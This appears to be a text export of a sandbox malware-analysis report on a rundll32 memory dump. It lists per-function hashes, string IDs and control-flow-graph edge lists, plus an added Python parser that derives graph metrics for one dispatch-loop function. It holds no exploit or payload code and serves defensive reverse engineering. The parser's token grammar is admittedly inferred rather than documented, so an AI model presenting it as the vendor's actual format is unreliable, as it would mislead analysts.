• Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
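Every control_flow_graph line in this section is the IDA plugin's edge list flattened into one token stream: a block id followed by its address or address range, optional `call <target>` tokens that belong to the block just named, and `A->B` edges. The parser below is an added example written for this page, not code from Joe Sandbox or its IDA plugin, and the token grammar is inferred from the listings here rather than taken from vendor documentation, so treat that grammar as an assumption. Its sample input is the edge list above for the function whose first block is 0x180021618, copied verbatim from this report. From it the code derives what a reverser checks before reading the blocks: block and edge counts, cyclomatic complexity, entry and exit blocks, the distinct call targets, and the block with the highest in-degree.

```python
import re
from collections import defaultdict

# Edge list copied verbatim from this report's control_flow_graph line for the
# function whose first block is 0x180021618 (process 3, rundll32 memory dump).
CFG_TEXT = (
    "control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 "
    "218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 "
    "220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 "
    "222 18002166b-180021670 219->222 224 180021838-180021845 220->224 "
    "225 180021c35 220->225 228 180021bdf-180021bee 221->228 "
    "226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 "
    "225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 "
    "228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 "
    "233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 "
    "236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 "
    "240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 "
    "239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 "
    "246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 "
    "246->217 247->217"
)

# Token grammar as inferred from the listings on this page (assumption, not
# vendor-documented): "<id> <hex>[-<hex>]" defines a block, "call <hex>" attaches
# to the most recently defined block, "<id>-><id>" is an edge.
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


def parse_cfg(text):
    """Parse one control_flow_graph token stream.

    Returns (blocks, edges): blocks maps block id -> {"start", "end", "calls"},
    edges is the list of (src, dst) block-id pairs in listing order.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges = {}, []
    current = None  # block that a following "call" token attaches to
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok == "call":
            if current is None or i + 1 >= len(tokens):
                raise ValueError(f"dangling call at token {i}")
            blocks[current]["calls"].append(int(tokens[i + 1], 16))
            i += 2
        elif NODE_RE.match(tok) and i + 1 < len(tokens):
            m = ADDR_RE.match(tokens[i + 1])
            if not m:
                raise ValueError(f"block {tok} lacks an address at token {i + 1}")
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start  # single-address block
            current = int(tok)
            blocks[current] = {"start": start, "end": end, "calls": []}
            i += 2
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an undefined block")
    return blocks, edges


def summarize(blocks, edges):
    """Derive the graph metrics a reverser checks before reading the blocks."""
    succ, pred = defaultdict(list), defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
        pred[dst].append(src)
    hub = max(blocks, key=lambda b: len(pred[b]))  # most-targeted block
    return {
        "blocks": len(blocks),
        "edges": len(edges),
        "cyclomatic": len(edges) - len(blocks) + 2,  # McCabe, one connected graph
        "entry": sorted(b for b in blocks if not pred[b]),
        "exits": sorted(b for b in blocks if not succ[b]),
        "hub": hub,
        "hub_in_degree": len(pred[hub]),
        "hub_span": blocks[hub]["end"] - blocks[hub]["start"],  # end minus start as listed
        "callees": sorted({c for b in blocks.values() for c in b["calls"]}),
        "lowest": min(b["start"] for b in blocks.values()),
        "highest": max(b["end"] for b in blocks.values()),
    }


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    for key, value in summarize(blocks, edges).items():
        if key in ("lowest", "highest"):
            value = hex(value)
        elif key == "callees":
            value = [hex(c) for c in value]
        print(f"{key:>14}: {value}")
```

On this function the summary reports 24 blocks, 33 edges, a single entry (216) and a single exit (224), and block 217 as the hub: a block whose listed range spans only six addresses, yet nine other blocks jump back to it, with the remaining blocks hanging off a chain of two-way branches (217, 219, 222, 227, 230, 233, 235, 239) whose far sides each call one routine and return to 217. That is the shape of a dispatch loop, and recognising it from the edge list saves time: the seven distinct call targets, not the 24 blocks, are the units worth opening next.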
Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $&.+$)O$.pN$F>9$t(/
• API String ID: 0-3036092626
• Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
• Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
(edge list only; the rendered graph's Executed / Not Executed block coloring is not preserved in this text export)
control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 284 18000cfb4-18000d00a call 1800194a4 257->284 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 269 18000cd35-18000cdce call 18000703c call 18001c32c 262->269 270 18000ccab-18000ccb0 262->270 263->253 272 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->272 273 18000c659-18000c65e 264->273 309 18000cdd3-18000ce2e call 1800194a4 269->309 279 18000ccb6-18000cd30 call 180021434 270->279 280 18000d00f-18000d014 270->280 311 18000ca57-18000caa0 call 1800194a4 272->311 282 18000c664-18000c669 273->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 273->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 284->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 309->253 311->253 316->253 325->253 326->253

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: +#;)$K'$sf$w\H
• API String ID: 0-1051058546
• Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
• Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
• Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
• Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: <4P$<8$<w.
• API String ID: 0-1030867500
• Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
• Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
• Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
• Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
• Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
• Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
• Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
(edge list only; the rendered graph's Executed / Not Executed block coloring is not preserved in this text export)
control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: "+H$1l7.$M8;$]$d$]k$]k$94
• API String ID: 0-2447245168
• Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
• Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
(edge list only; the rendered graph's Executed / Not Executed block coloring is not preserved in this text export)
control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
• API String ID: 0-2100131636
• Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
• Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
• Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
• Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
(edge list only; the rendered graph's Executed / Not Executed block coloring is not preserved in this text export)
control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $$"`2$lbzZ$lmq$tro$kO
• API String ID: 0-2401169580
• Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
• Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
• Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
• Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: )#?$EX.$PT$UbA$2f
• API String ID: 0-1318892062
• Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
• Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
• Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
• Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
(edge list only; the rendered graph's Executed / Not Executed block coloring is not preserved in this text export)
control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                • API String ID: 0-746338152
                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                • API String ID: 0-498664264
                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
